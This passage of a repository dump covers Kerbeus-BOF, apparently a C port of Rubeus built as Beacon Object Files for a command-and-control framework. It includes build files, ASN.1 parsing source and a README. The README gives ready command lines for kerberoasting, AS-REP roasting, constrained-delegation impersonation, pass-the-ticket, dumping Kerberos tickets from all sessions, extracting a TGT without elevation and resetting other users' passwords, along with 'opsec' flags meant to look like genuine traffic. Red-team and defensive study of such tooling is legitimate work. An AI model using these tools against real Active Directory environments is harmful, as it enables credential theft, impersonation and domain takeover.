    COMMENT "Copying kerberoasting object file"
)

add_custom_target(copy_kerb_s4u ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_s4u> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/s4u.x64.o
    DEPENDS kerb_s4u
    COMMENT "Copying s4u object file"
)

add_custom_target(copy_kerb_cross_s4u ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:kerb_cross_s4u> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/Kerbeus-BOF/cross_s4u.x64.o
    DEPENDS kerb_cross_s4u
    COMMENT "Copying cross_s4u object file"
)


================================================
FILE: AD-BOF/Kerbeus-BOF/Makefile
================================================
CC64 = x86_64-w64-mingw32-gcc
STRIP64 = x86_64-w64-mingw32-strip --strip-unneeded
CFLAGS = -I ./ -w -Wno-incompatible-pointer-types -Os -s -DBOF -c

all: bof

bof:
	@(mkdir -p _bin/Kerbeus-BOF 2>/dev/null) && echo 'creating _bin/Kerbeus-BOF' || echo '_bin/Kerbeus-BOF exists'
	@($(CC64) $(CFLAGS) hash/hash.c -o _bin/Kerbeus-BOF/hash.x64.o    && $(STRIP64) _bin/Kerbeus-BOF/hash.x64.o) && echo '[+] hash' || echo '[!] hash'
	@($(CC64) $(CFLAGS) klist/klist.c -o _bin/Kerbeus-BOF/klist.x64.o && $(STRIP64) _bin/Kerbeus-BOF/klist.x64.o) && echo '[+] klist' || echo '[!] klist'
	@($(CC64) $(CFLAGS) -DTRIAGE klist/klist.c -o _bin/Kerbeus-BOF/triage.x64.o && $(STRIP64) _bin/Kerbeus-BOF/triage.x64.o) && echo '[+] triage' || echo '[!] triage'
	@($(CC64) $(CFLAGS) -DDUMP klist/klist.c -o _bin/Kerbeus-BOF/dump.x64.o     && $(STRIP64) _bin/Kerbeus-BOF/dump.x64.o) && echo '[+] dump' || echo '[!] dump'
	@($(CC64) $(CFLAGS) describe/describe.c -o _bin/Kerbeus-BOF/describe.x64.o  && $(STRIP64) _bin/Kerbeus-BOF/describe.x64.o) && echo '[+] describe' || echo '[!] describe'
	@($(CC64) $(CFLAGS) tgtdeleg/tgtdeleg.c -o _bin/Kerbeus-BOF/tgtdeleg.x64.o  && $(STRIP64) _bin/Kerbeus-BOF/tgtdeleg.x64.o) && echo '[+] tgtdeleg' || echo '[!] tgtdeleg'
	@($(CC64) $(CFLAGS) ptt/ptt.c -o _bin/Kerbeus-BOF/ptt.x64.o                 && $(STRIP64) _bin/Kerbeus-BOF/ptt.x64.o) && echo '[+] ptt' || echo '[!] ptt'
	@($(CC64) $(CFLAGS) purge/purge.c -o _bin/Kerbeus-BOF/purge.x64.o           && $(STRIP64) _bin/Kerbeus-BOF/purge.x64.o) && echo '[+] purge' || echo '[!] purge'
	@($(CC64) $(CFLAGS) asktgt/asktgt.c -o _bin/Kerbeus-BOF/asktgt.x64.o        && $(STRIP64) _bin/Kerbeus-BOF/asktgt.x64.o) && echo '[+] asktgt' || echo '[!] asktgt'
	@($(CC64) $(CFLAGS) asktgs/asktgs.c -o _bin/Kerbeus-BOF/asktgs.x64.o        && $(STRIP64) _bin/Kerbeus-BOF/asktgs.x64.o) && echo '[+] asktgs' || echo '[!] asktgs'
	@($(CC64) $(CFLAGS) renew/renew.c -o _bin/Kerbeus-BOF/renew.x64.o           && $(STRIP64) _bin/Kerbeus-BOF/renew.x64.o) && echo '[+] renew' || echo '[!] renew'
	@($(CC64) $(CFLAGS) changepw/changepw.c -o _bin/Kerbeus-BOF/changepw.x64.o  && $(STRIP64) _bin/Kerbeus-BOF/changepw.x64.o) && echo '[+] changepw' || echo '[!] changepw'
	@($(CC64) $(CFLAGS) asreproasting/asreproasting.c -o _bin/Kerbeus-BOF/asreproasting.x64.o && $(STRIP64) _bin/Kerbeus-BOF/asreproasting.x64.o) && echo '[+] asreproasting' || echo '[!] asreproasting'
	@($(CC64) $(CFLAGS) kerberoasting/kerberoasting.c -o _bin/Kerbeus-BOF/kerberoasting.x64.o && $(STRIP64) _bin/Kerbeus-BOF/kerberoasting.x64.o) && echo '[+] kerberoasting' || echo '[!] kerberoasting'
	@($(CC64) $(CFLAGS) s4u/s4u.c -o _bin/Kerbeus-BOF/s4u.x64.o             && $(STRIP64) _bin/Kerbeus-BOF/s4u.x64.o) && echo '[+] s4u' || echo '[!] s4u'
	@($(CC64) $(CFLAGS) s4u/cross_s4u.c -o _bin/Kerbeus-BOF/cross_s4u.x64.o && $(STRIP64) _bin/Kerbeus-BOF/cross_s4u.x64.o) && echo '[+] cross_s4u' || echo '[!] cross_s4u'

clean:
	@(rm -rf _bin)


================================================
FILE: AD-BOF/Kerbeus-BOF/README.md
================================================
# Kerbeus-BOF

----

Beacon Object Files for Kerberos abuse. This is an implementation of some important features of the [Rubeus](https://github.com/GhostPack/Rubeus) project, written in C. The project features integration with the [AdaptixC2](https://github.com/Adaptix-Framework/AdaptixC2).

## Ticket requests and renewals

### asktgt

The **asktgt** action will build raw AS-REQ (TGT request) traffic for the specified user and encryption key (`/rc4` or `/aes256`). A `/password` flag can also be used instead of a hash - in this case `/enctype:X` will default to RC4. If no `/domain` is specified, the computer's current domain is extracted, and if no `/dc` is specified the same is done for the system's current domain controller. If authentication is successful, the resulting AS-REP is parsed and the KRB-CRED (a .kirbi, which includes the user's TGT) is output as a base64 blob. The `/ptt` flag will "pass-the-ticket" and apply the resulting Kerberos credential to the current logon session. **Also, another opsec note:** only one TGT can be applied at a time to the current logon session, so the previous TGT is wiped when the new ticket is applied when using the `/ptt` option.

To form AS-REQ's more inline with genuine requests, the `/opsec` flag can be used, this will send an initial AS-REQ without pre-authentication first, if this succeeds, the resulting AS-REP is decrypted and TGT return, otherwise an AS-REQ with pre-authentication is then sent.

Requesting a TGT without a PAC can be done using the `/nopac` switch. The `/nopreauth` flag can be used to send an AS-REQ without pre-authentication.

```
kerbeus asktgt /user:USER /password:PASSWORD [/domain:DOMAIN] [/dc:DC] [/enctype:{rc4|aes256}] [/ptt] [/nopac] [/opsec]
kerbeus asktgt /user:USER /aes256:HASH [/domain:DOMAIN] [/dc:DC] [/ptt] [/nopac] [/opsec]
kerbeus asktgt /user:USER /rc4:HASH [/domain:DOMAIN] [/dc:DC] [/ptt] [/nopac]
kerbeus asktgt /user:USER /nopreauth [/domain:DOMAIN] [/dc:DC] [/ptt]
```

![](_img/02.png)



### asktgs

The **asktgs** action will build/parse a raw TGS-REQ/TGS-REP service ticket request using the specified TGT `/ticket:X` supplied. This value **must** be a base64 encoding of a .kirbi file. If a `/dc` is not specified, the computer's current domain controller is extracted and used as the destination for the request traffic. The `/ptt` flag will "pass-the-ticket" and apply the resulting service ticket to the current logon session. One or more `/service:X` SPNs **must** be specified, comma separated.

The supported encryption types in the constructed TGS-REQ will be RC4_HMAC and AES256_CTS_HMAC_SHA1. In this case, the highest mutually supported encryption will be used by the KDC to build the returned service ticket. If you want to force RC4 or AES256 keys, use `/enctype:[rc4 or aes256]`.

To form TGS-REQ's more inline with genuine requests, the `/opsec` flag can be used, this will also cause an additional TGS-REQ to be sent automatically when a service ticket is requested for an account configured for unconstrained delegation.

The `/u2u` flag was implemented to request User-to-User tickets. Together with the `/tgs:X` argument (used to supply the target accounts TGT), the `/service:X` argument can be the username of the account the supplied TGT is for (with the `/tgs:X` argument). The `/targetuser:X` argument will request a PAC of any other account by inserting a PA-FOR-USER PA data section with the `target user's` username.

The `/keyList` flag was implemented for Kerberos [Key List Requests](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/732211ae-4891-40d3-b2b6-85ebd6f5ffff). These requests must utilise a forged partial TGT from a read-only domain controller in the `/ticket:BASE64` parameter. Furthermore, the `/spn:x` field must be set to the KRBTGT SPN within the domain, eg. `KRBTBT/domain.local`.

```
kerbeus asktgs /ticket:BASE64 /service:SPN1,SPN2,... [/domain:DOMAIN] [/dc:DC] [/tgs:BASE64] [/targetdomain:DOMAIN] [/targetuser:USER] [/enctype:{rc4|aes256}] [/ptt] [/keylist] [/u2u] [/opsec]
```

![](_img/03.png)



### renew

The **renew** action will build/parse a raw TGS-REQ/TGS-REP TGT renewal exchange using the specified `/ticket:X` supplied. This value must be a base64 encoding of a .kirbi file. If a `/dc` is not specified, the computer's current domain controller is extracted and used as the destination for the renewal traffic. The `/ptt` flag will "pass-the-ticket" and apply the resulting Kerberos credential to the current logon session.

```
kerbeus renew /ticket:BASE64 [/dc:DC] [/ptt]
```



## Constrained delegation abuse

If a user (or computer) account is configured for constrained delegation (i.e. has a SPN value in its msds-allowedtodelegateto field) this action can be used to abuse access to the target SPN/server. 

A **TL;DR** explanation is that an account with constrained delegation enabled is allowed to request tickets _to itself_ as any user, in a process known as S4U2self. In order for an account to be allowed to do this, it has to have **TrustedToAuthForDelegation** enabled in it's useraccountcontrol property, something that only elevated users can modify by default. This ticket has the **FORWARDABLE** flag set by default. The service can then use this specially requested ticket to request a service ticket to any service principal name (SPN) specified in the account's **msds-allowedtodelegateto** field. So long story short, if you have control of an account with **TrustedToAuthForDelegation** set and a value in **msds-allowedtodelegateto**, you can pretend to be any user in the domain to the SPNs set in the account's **msds-allowedtodelegateto** field.

S4U2self ticket can then be used as a `/tgs:Y` parameter (base64 blob) to execute the S4U2proxy process. A valid **msds-allowedtodelegateto** value for the account must be supplied (`/service:X`).

The `/altservice` parameter allows us to substitute in any service name we want in the resulting KRB-CRED file. One or more alternate service names can be supplied, comma separated (`/altservice:cifs,HOST,...`).

To form the TGS-REQ's more inline with genuine requests, the `/opsec` flag can be used. 

It is possible, in certain cirsumstances, to use an S4U2Self ticket to impersonate protected users in order to escalate privileges on the requesting system, as discussed [here](https://exploit.ph/revisiting-delegate-2-thyself.html). For this purpose, the `/self` flag and `/altservice:X` argument can be used to generate a usable service ticket.

To forge an S4U2Self referral, only the trust key is required. By using the `/targetdomain:X` argument with the `/self` flag and without the `/targetdc` argument, it will treat the ticket supplied with `/ticket:X` as an S4U2Self referral and only request the final S4U2Self service ticket. The `/altservice:X` can also be used to rewrite the sname in the resulting ticket.

```
kerbeus s4u /ticket:BASE64 /service:SPN {/impersonateuser:USER | /tgs:BASE64} [/domain:DOMAIN] [/dc:DC] [/altservice:SERVICE] [/ptt] [/nopac] [/opsec] [/self]

kerbeus cross_s4u /ticket:BASE64 /service:SPN /targetdomain:DOMAIN /targetdc:DC {/impersonateuser:USER | /tgs:BASE64} [/domain:DOMAIN] [/dc:DC] [/altservice:SERVICE] [/nopac] [/self]
```

![](_img/04.png)



## Ticket Management

### ptt

The **ptt** action will submit a `/ticket:X` (TGT or service ticket) for the current logon session through the LsaCallAuthenticationPackage() API with a KERB_SUBMIT_TKT_REQUEST message, or (**if elevated**) to the logon session specified by `/luid:ea4..`. Like other `/ticket:X` parameters, the value can be a base64 encoding of a .kirbi file.

```
kerbeus ptt /ticket:BASE64 [/luid:LOGONID]
```



### purge

The **purge** action will purge all Kerberos tickets from the current logon session, or (if elevated) to the logon session specified by `/luid:0xA..`.

```
kerbeus purge [/luid:LOGONID]
```



### describe

The **describe** action takes a `/ticket:X` value (TGT or service ticket), parses it, and describes the values of the ticket. Like other `/ticket:X` parameters, the value can be a base64 encoding of a .kirbi file.

```
kerbeus describe /ticket:BASE64
```



### klist

The **klist** will list detailed information on the current user's logon session and Kerberos tickets, if not elevated. If run from an elevated context (**SYSTEM**), information on all logon sessions and associated Kerberos tickets is displayed. Logon and ticket information can be displayed for a specific LogonID with `/luid:3ea..` (if elevated).

```
kerbeus klist [/luid:LOGINID] [/user:USER] [/service:SERVICE] [/client:CLIENT]
```

![](_img/05.png)



### dump

The **dump** action will extract current TGTs and service tickets if in an elevated context (**SYSTEM**). If not elevated, service tickets for the current user are extracted.

```
kerbeus dump [/luid:LOGINID] [/user:USER] [/service:SERVICE] [/client:CLIENT]
```

![](_img/06.png)



### triage

The **triage** action will output a table of the current user's Kerberos tickets, if not elevated. If run from an elevated context (**SYSTEM**), a table describing all Kerberos tickets on the system is displayed.

```
kerbeus triage [/luid:LOGINID] [/user:USER] [/service:SERVICE] [/client:CLIENT]
```

![](_img/07.png)



#### filters

For the `klist`, `triage` and `dump`, tickets can be filtered by `/luid`, `/service` and `/client`. **Need SYSTEM context**.



### tgtdeleg

The **tgtdeleg** abuses the Kerberos GSS-API to retrieve a usable TGT for the current user without needing elevation on the host. AcquireCredentialsHandle() is used to get a handle to the current user's Kerberos security credentials, and InitializeSecurityContext() with the ISC_REQ_DELEGATE flag and a target SPN of CIFS/DC.domain.com to prepare a fake delegate context to send to the DC. This results in an AP-REQ in the GSS-API output that contains a kerbeus CRED in the authenticator checksum. The service ticket session key is extracted from the local Kerberos cache and is used to decrypt the kerbeus CRED in the authenticator, resulting in a usable TGT .kirbi.

If automatic target/domain extraction is failing, a known SPN of a service configured with unconstrained delegation can be specified with `/target:SPN`.

```
kerbeus tgtdeleg [/target:SPN]
```

![](_img/08.png)



## Roasting

### kerberoasting

The **kerberoasting** is used to request the appropriate service ticket. The `/ticket:X` argument specifies the domain user's TGT ticket. The `/spn:X` argument specifies the target SPN. The `/domain` and `/dc` arguments are optional and retrieve system defaults just like the other actions.

The `/nopreauth:USER` argument will attempt to send an AS-REQ with the service passed to `/spn:Y` to request service tickets.

```
kerbeus kerberoasting /spn:SPN [/nopreauth:USER] [/dc:DC] [/domain:DOMAIN]
kerbeus kerberoasting /spn:SPN /ticket:BASE64 [/dc:DC]
```

![](_img/09.png)



### asreproasting

If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting. The `/user:X` argument specifies the target user. The `/domain` and `/dc` arguments are optional, pulling system defaults as other actions do.

```
kerbeus asreproasting /user:USER [/dc:DC] [/domain:DOMAIN]
```

![](_img/10.png)



## Miscellaneous

### hash

The **hash** action will take a `/password:X` and optional `/user:USER` and/or `/domain:DOMAIN`. It will generate the rc4_hmac (NTLM) representation of the password. If user and domain names are specified, the aes128_cts_hmac_sha1 and aes256_cts_hmac_sha1 hash forms are generated. The user and domain names are used as salts for the AES implementations.

```
kerbeus hash /password:PASSWORD [/user:USER] [/domain:DOMAIN]
```

![](_img/11.png)



### changepw

The **changepw** action will take a user's TGT .kirbi blob and execute a MS kpasswd password change with the specified `/new:PASSWORD` value. If a `/dc` is not specified, the computer's current domain controller is extracted and used as the destination for the password reset traffic.

The `/targetuser` and `/targetdomain` arguments can be used to change the password of other users, given the user whose TGT it is has enough privileges.

**Note that either a users TGT or a service ticket for kadmin/changepw can be used to change the password**

```
kerbeus changepw /ticket:BASE64 /new:PASSWORD [/dc:DC] [/targetuser:USER] [/targetdomain:DOMAIN]
```

## Credits
* Rubeus - https://github.com/GhostPack/Rubeus
* CS-Situational-Awareness-BOF - https://github.com/trustedsec/CS-Situational-Awareness-BOF
* nanorobeus - https://github.com/wavvs/nanorobeus


================================================
FILE: AD-BOF/Kerbeus-BOF/_include/asn_convert.c
================================================
#pragma once
#include "functions.c"

int AsnToBytesEncode5(AsnElt* a, int start, int end, byte* dst, int dstOff);

int ValueLength(AsnElt* a);

int TagLength(int tagValue) {
    if (tagValue < 0x1F) return 1;
    int k = 0;
    for (int v = tagValue; v > 0; v >>= 7, k += 7);
    return (k / 7) + 1;
}

int LengthLength(int vlen) {
    if (vlen < 0x80) return 1;
    int k = 0;
    for (int v = vlen; v > 0; v >>= 8, k += 8);
    return (k / 8) + 1;
}

int EncodedLength(AsnElt* a) {
    if (a->objLen < 0) {
        int vlen = ValueLength(a);
        a->objLen = TagLength(a->tagValue) + LengthLength(vlen) + vlen;
    }
    return a->objLen;
}

int ValueLength(AsnElt* a) {
    if (a->valLen < 0) {
        if (a->sub != NULL) {
            int vlen = 0;
            for (int i = 0; i < a->subCount; i++) {
                if (&(a->sub[i]))
                    vlen += EncodedLength(&(a->sub[i]));
            }
            a->valLen = vlen;
        }
        else {
            a->valLen = a->objLen;
        }
    }
    return a->valLen;
}

int EncodeValue(AsnElt* a, int start, int end, byte* dst, int dstOff) {
    if (!a)
        return 0;

    int orig = dstOff;
    if (a->objBuf == NULL) {
        int k = 0;
        for (int i = 0; i < a->subCount; i++) {
            int slen = EncodedLength(&(a->sub[i]));
            dstOff += AsnToBytesEncode5(&(a->sub[i]), start - k, end - k, dst, dstOff);
            k += slen;
        }
    }
    else {
        int from = (start > 0) ? start : 0;
        int to = (end > a->valLen) ? a->valLen : end;
        int len = to - from;
        if (len > 0) {
            MemCpy(dst + dstOff, a->objBuf + (a->valOff + from), len);
            dstOff += len;
        }
    }
    return dstOff - orig;
}

int AsnToBytesEncode5(AsnElt* a, int start, int end, byte* dst, int dstOff) {
    if (a->hasEncodedHeader) {
        int from = a->objOff + ((start > 0) ? start : 0);
        int to = a->objOff + ((end > a->objLen) ? a->objLen : end);
        int len = to - from;
        if (len > 0) {
            MemCpy(&dst[dstOff], &a->objBuf[from], len);
            return len;
        }
        else {
            return 0;
        }
    }

    int off = 0;

    int fb = (a->tagClass << 6) + ((a->sub != NULL) ? 0x20 : 0x00);
    if (a->tagValue < 0x1F) {
        fb |= (a->tagValue & 0x1F);
        if (start <= off && off < end)
            dst[dstOff++] = (byte)fb;
        off++;
    }
    else {
        fb |= 0x1F;
        if (start <= off && off < end)
            dst[dstOff++] = (byte)fb;

        off++;
        int k = 0;
        for (int v = a->tagValue; v > 0; v >>= 7, k += 7);
        while (k > 0) {
            k -= 7;
            int v = (a->tagValue >> k) & 0x7F;
            if (k != 0)
                v |= 0x80;
            if (start <= off && off < end)
                dst[dstOff++] = (byte)v;
            off++;
        }
    }

    int vlen = ValueLength(a);
    if (vlen < 0x80) {
        if (start <= off && off < end)
            dst[dstOff++] = (byte)vlen;
        off++;
    }
    else {
        int k = 0;
        for (int v = vlen; v > 0; v >>= 8, k += 8);
        if (start <= off && off < end)
            dst[dstOff++] = (byte)(0x80 + (k >> 3));
        off++;
        while (k > 0) {
            k -= 8;
            if (start <= off && off < end)
                dst[dstOff++] = (byte)(vlen >> k);
            off++;
        }
    }

    EncodeValue(a, start - off, end - off, dst, dstOff);
    off += vlen;

    return (off > 0) ? off : 0;
}

int AsnToBytesEncode3(AsnElt* a, byte* dst, int dstOff) {
    return AsnToBytesEncode5(a, 0, INT_MAX, dst, dstOff);
}

bool AsnToBytesEncode(AsnElt* a, int* size, byte** ret) {
    *ret = MemAlloc(EncodedLength(a));
    if (!*ret) {
        PRINT_OUT("[x] Failed alloc memory");
        return true;
    }
    *size = AsnToBytesEncode3(a, *ret, 0);
    return false;
}


================================================
FILE: AD-BOF/Kerbeus-BOF/_include/asn_decode.c
================================================
#include "asn_convert.c"

bool BytesToAsnDecode9(byte* buf, int off, int maxLen, int* tc, int* tv, bool* cons, int* valOff, int* valLen, int* ret);


bool CheckOff(int off, int lim) {
    if (off >= lim)
        return true;
    return false;
}

int Dec2(byte* s, int off, bool* good) {
    if (off < 0 || off >= (my_strlen(s) - 1)) {
        *good = FALSE;
        return -1;
    }
    char c1 = s[off];
    char c2 = s[off + 1];
    if (c1 < '0' || c1 > '9' || c2 < '0' || c2 > '9') {
        *good = FALSE;
        return -1;
    }
    return 10 * (c1 - '0') + (c2 - '0');
}

int IndexOf(byte* str, int len, byte c) {
    int j = -1;
    for (int i = 0; i < len; i++) {
        if (str[i] == c) {
            j = i;
            break;
        }
    }
    return j;
}

bool CheckTag(AsnElt* a, int tc, int tv) {
    if (a->tagClass != tc || a->tagValue != tv)
        return true;
    return false;
}

bool ValueByte(AsnElt* a, int off, int* ret) {
    if (off < 0) {
        PRINT_OUT("invalid value offset: &d\n", off);
        return true;
    }
    if (a->objBuf == NULL) {
        int k = 0;
        for (int i = 0; i < a->subCount; a++) {
            int slen = EncodedLength(&(a->sub[i]));
            if ((k + slen) > off) {
                return ValueByte(a, off - k, ret);
            }
        }
    }
    else {
        if (off < a->valLen) {
            *ret = a->objBuf[a->valOff + off];
            return false;
        }
    }
    PRINT_OUT("invalid value offset {0} (length = {1})");
    return true;
}

int CopyValue3(AsnElt* a, byte* dst, int off) {
    return EncodeValue(a, 0, INT_MAX, dst, off);
}



bool DecodeUTF8(byte* buf, int off, int len, byte** ret, int* ret_length) {
    if (len >= 3 && buf[off] == 0xEF && buf[off + 1] == 0xBB && buf[off + 2] == 0xBF) {
        off += 3;
        len -= 3;
    }
    wchar_t* tc = MemAlloc(len * 2 + 1);
    int tcOff;
    for (int k = 0; k < 2; k++) {
        tcOff = 0;
        for (int i = 0; i < len; i++) {
            int c = buf[off + i];
            int e;
            if (c < 0x80) {
                e = 0;
            }
            else if (c < 0xC0) {
            }
            else if (c < 0xE0) {
                c &= 0x1F;
                e = 1;
            }
            else if (c < 0xF0) {
                c &= 0x0F;
                e = 2;
            }
            else if (c < 0xF8) {
                c &= 0x07;
                e = 3;
            }
            else {
                return true;
            }
            while (e-- > 0) {
                if (++i >= len) return true;

                int d = buf[off + i];
                if (d < 0x80 || d > 0xBF) {
                    return true;
                }
                c = (c << 6) + (d & 0x3F);
            }
            if (c > 0x10FFFF) return true;

            if (c > 0xFFFF) {
                c -= 0x10000;
                int hi = 0xD800 + (c >> 10);
                int lo = 0xDC00 + (c & 0x3FF);
                tc[tcOff] = (char)hi;
                tc[tcOff + 1] = (char)lo;
                tcOff += 2;
            }
            else {
                tc[tcOff] = (wchar_t)c;
                tcOff++;
            }
        }
    }
    tc[tcOff] = 0;
    *ret_length = tcOff + 1;
    *ret = tc;
    return false;
}

bool DecodeMono(byte* buf, int off, int len, int type, byte** outBuf, int* outLen) {
    if (my_copybuf(outBuf, buf + off, len + 1)) return true;
    (*outBuf)[len] = 0;

    *outLen = len;
    return false;
}


bool DecodeNoCopyLength(byte* buf, int off, int len, int* ret) {
    int tc, tv, valOff, valLen, objLen;
    bool cons;
    if (BytesToAsnDecode9(buf, off, len, &tc, &tv, &cons, &valOff, &valLen, &objLen))
        return true;
    if (cons) {
        off = valOff;
        int lim = valOff + valLen;
        while (off < lim) {
            int oLength = 0;
            if (DecodeNoCopyLength(buf, off, lim - off, &oLength))
                return true;
            off += oLength;
        }
    }
    *ret = objLen;
    return false;
}

bool DecodeNoCopy(byte* buf, int off, int len, AsnElt* a) {
    int tc, tv, valOff, valLen, objLen;
    bool cons;
    if (BytesToAsnDecode9(buf, off, len, &tc, &tv, &cons, &valOff, &valLen, &objLen))
        return true;

    a->tagClass = tc;
    a->tagValue = tv;
    a->objBuf = buf;
    a->objBufSize = len;
    a->objOff = off;
    a->objLen = objLen;
    a->valOff = valOff;
    a->valLen = valLen;
    a->hasEncodedHeader = true;

    if (cons) {
        off = valOff;
        int lim = valOff + valLen;

        int count = 0;

        while (off < lim) {
            int oLength = 0;
            if (DecodeNoCopyLength(buf, off, lim - off, &oLength))
                return true;
            off += oLength;
            count++;
        }

        off = valOff;
        lim = valOff + valLen;
        int index = 0;
        AsnElt* subs = MemAlloc(sizeof(AsnElt) * count);
        if (!subs) {
            PRINT_OUT("[x] Failed alloc memory");
            return true;
        }
        while (off < lim && index <= count) {
            AsnElt b = { 0 };
            if (DecodeNoCopy(buf, off, lim - off, &b)) {
                return true;
            }
            off += b.objLen;
            subs[index] = b;
            index++;
        }
        a->sub = subs;
        a->subCount = count;
    }
    else {
        a->sub = NULL;
        a->subCount = 0;
    }
    return false;
}

bool BytesToAsnDecode9(byte* buf, int off, int maxLen, int* tc, int* tv, bool* cons, int* valOff, int* valLen, int* ret) {
    bool status = false;

    int lim = off + maxLen;
    int orig = off;

    if (CheckOff(off, lim)) return true;
    *tv = buf[off++];
    *cons = (*tv & 0x20) != 0;
    *tc = *tv >> 6;
    *tv &= 0x1F;
    if (*tv == 0x1F) {
        *tv = 0;
        for (;;) {
            if (CheckOff(off, lim)) return true;
            int c = buf[off++];
            if (*tv > 0xFFFFFF) {
                PRINT_OUT("tag value overflow\n");
                return true;
            }
            *tv = (*tv << 7) | (c & 0x7F);
            if ((c & 0x80) == 0) {
                break;
            }
        }
    }

    if (CheckOff(off, lim)) return true;
    int vlen = buf[off++];
    if (vlen == 0x80) {
        vlen = -1;
        if (!(*cons)) {
            PRINT_OUT("indefinite length but not constructed\n");
            return true;
        }
    }
    else if (vlen > 0x80) {
        int lenlen = vlen - 0x80;
        if (CheckOff(off + lenlen - 1, lim)) return true;
        vlen = 0;
        while (lenlen-- > 0) {
            if (vlen > 0x7FFFFF) {
                PRINT_OUT("length overflow\n");
                return true;
            }
            vlen = (vlen << 8) + buf[off++];
        }
    }

    *valOff = off;
    if (vlen < 0) {
        for (;;) {
            int tc2, tv2, valOff2, valLen2;
            bool cons2;
            int slen = 0;
            if (BytesToAsnDecode9(buf, off, lim - off, &tc2, &tv2, &cons2, &valOff2, &valLen2, &slen))
                return true;

            if (tc2 == 0 && tv2 == 0) {
                if (cons2 || valLen2 != 0) {
                    PRINT_OUT("invalid null tag\n");
                    return true;
                }
                *valLen = off - *valOff;
                off += slen;
                break;
            }
            else {
                off += slen;
            }
        }
    }
    else {
        if (vlen > (lim - off)) {
            PRINT_OUT("value overflow\n");
            return true;
        }
        off += vlen;
        *valLen = off - *valOff;
    }
    *ret = off - orig;
    return false;
}

bool BytesToAsnDecode4(byte* buf, int off, int len, bool exactLength, AsnElt* a) {
    int tc, tv, valOff, valLen, objLen;
    bool cons;
    if (BytesToAsnDecode9(buf, off, len, &tc, &tv, &cons, &valOff, &valLen, &objLen)) return true;

    if (exactLength && objLen != len) {
        PRINT_OUT("trailing garbage\n");
        return true;
    }
    byte* nbuf = 0;
    if (my_copybuf(&nbuf, buf + off, objLen)) return true;
    return DecodeNoCopy(nbuf, 0, objLen, a);
}

bool BytesToAsnDecode3(byte* buf, int len, bool exactLength, AsnElt* a) {
    return BytesToAsnDecode4(buf, 0, len, exactLength, a);
}

bool BytesToAsnDecode(byte* buf, int len, AsnElt* a) {
    return BytesToAsnDecode4(buf, 0, len, true, a);
}



bool AsnGetInteger(AsnElt* a, long* ret) {
    if ( !a )
        return 0;

    if ( a->sub ) {
//        PRINT_OUT("invalid INTEGER (constructed)\n");
        return true;
    }
    int vlen = ValueLength(a);
    if (vlen == 0) {
//        PRINT_OUT("invalid INTEGER (length = 0)\n");
        return true;
    }
    int v = 0;
    if (ValueByte(a, 0, &v)) return true;

    long long x;
    if ((v & 0x80) != 0) {
        x = -1;
        for (int k = 0; k < vlen; k++) {
            long long l = -1;
            l = l << 55;
            if (x < l) {
//                PRINT_OUT("integer overflow (negative)\n");
                return true;
            }
            int ll = 0;
            if (ValueByte(a, k, &ll))
                return true;
            x = (x << 8) + (long)ll;
        }
    }
    else {
        x = 0;
        for (int k = 0; k < vlen; k++) {
            long long l = 1;
            l = l << 55;
            if (x >= l) {
//                PRINT_OUT("integer overflow (positive): %d >= %d\n", x, l);
                return true;
            }
            int ll = 0;
            if (ValueByte(a, k, &ll))
                return true;
            x = (x << 8) + (long)ll;
        }
    }
    *ret = (long) x;
    return false;
}

bool AsnGetOctetString3(AsnElt* a, byte* dst, int off, int* ret) {
    if (!a)
        return true;

    if ( a->sub ) {
        int orig = off;
        for (int i = 0; i < a->subCount; i++) {
            if (CheckTag(&(a->sub[i]), ASN_UNIVERSAL, ASN_OCTET_STRING))
                return true;
            int ii = 0;
            if (AsnGetOctetString3(&(a->sub[i]), dst, off, &ii))
                return true;
            off += ii;
        }
        *ret = off - orig;
        return false;

    }
    if ( dst ) {
        *ret = CopyValue3(a, dst, off);
        return false;
    }
    else {
        *ret = ValueLength(a);
        return false;
    }
}

bool AsnGetOctetString(AsnElt* a, byte** ret, int* len) {
    if (AsnGetOctetString3(a, NULL, 0, len)) return true;

    *ret = MemAlloc(*len);
    if (!*ret) {
        PRINT_OUT("[x] Failed alloc memory");
        return true;
    }

    if (AsnGetOctetString3(a, *ret, 0, len))
        return true;

    return false;
}

bool AsnGetString(AsnElt* a, byte** ret) {
    int len = 0;
    char* r = 0;
    if (AsnGetOctetString(a, &r, &len)) return true;

    if (my_copybuf(ret, r, len + 1)) {
        return true;
    }
    (*ret)[len] = 0;
    return false;
}

bool AsnGetPrincipalName(AsnElt* a, PrincipalName* pname) {
    if (AsnGetInteger(&(a->sub[0].sub[0]), &(pname->name_type))) return true;
    pname->name_count = a->sub[1].sub[0].subCount;
    pname->name_string = MemAlloc(sizeof(void*) * pname->name_count);
    for (int i = 0; i < pname->name_count; i++) {
        byte* s = 0;
        int len = ValueLength(&(a->sub[1].sub[0].sub[i]));
        if (AsnGetString(&(a->sub[1].sub[0].sub[i]), &s)) {
            return true;
        }
        wchar_t* ws = 0;
        int ws_length = 0;
        if (DecodeUTF8(s, 0, len, &ws, &ws_length)) return true;

        pname->name_string[i] = MemAlloc(ws_length);
        KERNEL32$WideCharToMultiByte(CP_ACP, 0, ws, ws_length, pname->name_string[i], ws_length, NULL, 0);
    }
    return false;
}

bool AsnGetEncryptedData(AsnElt* a, EncryptedData* encdata) {
    long long tmpLong = 0;
    for (int i = 0;i < a->subCount; i++) {
        switch (a->sub[i].tagValue) {
            case 0:
                if (AsnGetInteger(&(a->sub[i].sub[0]), &tmpLong)) return true;
                encdata->etype = (int)tmpLong;
                break;
            case 1:
                if (AsnGetInteger(&(a->sub[i].sub[0]), &tmpLong)) return true;
                encdata->kvno = (uint)(tmpLong & 0x00000000ffffffff);
                break;
            case 2:
                if (AsnGetOctetString(&(a->sub[i].sub[0]), &(encdata->cipher), &(encdata->cipher_size))) return true;
                break;
            default:
                break;
        }
    }
    return false;
}

bool AsnGetTicket(AsnElt* a, Ticket* ticket) {
    long long tmpLong = 0;
    for (int i = 0; i < a->subCount; i++) {
        switch (a->sub[i].tagValue) {
            case 0:
                if (AsnGetInteger(&(a->sub[i].sub[0]), &tmpLong)) return true;
                ticket->tkt_vno = (INT)tmpLong;
                break;
            case 1:
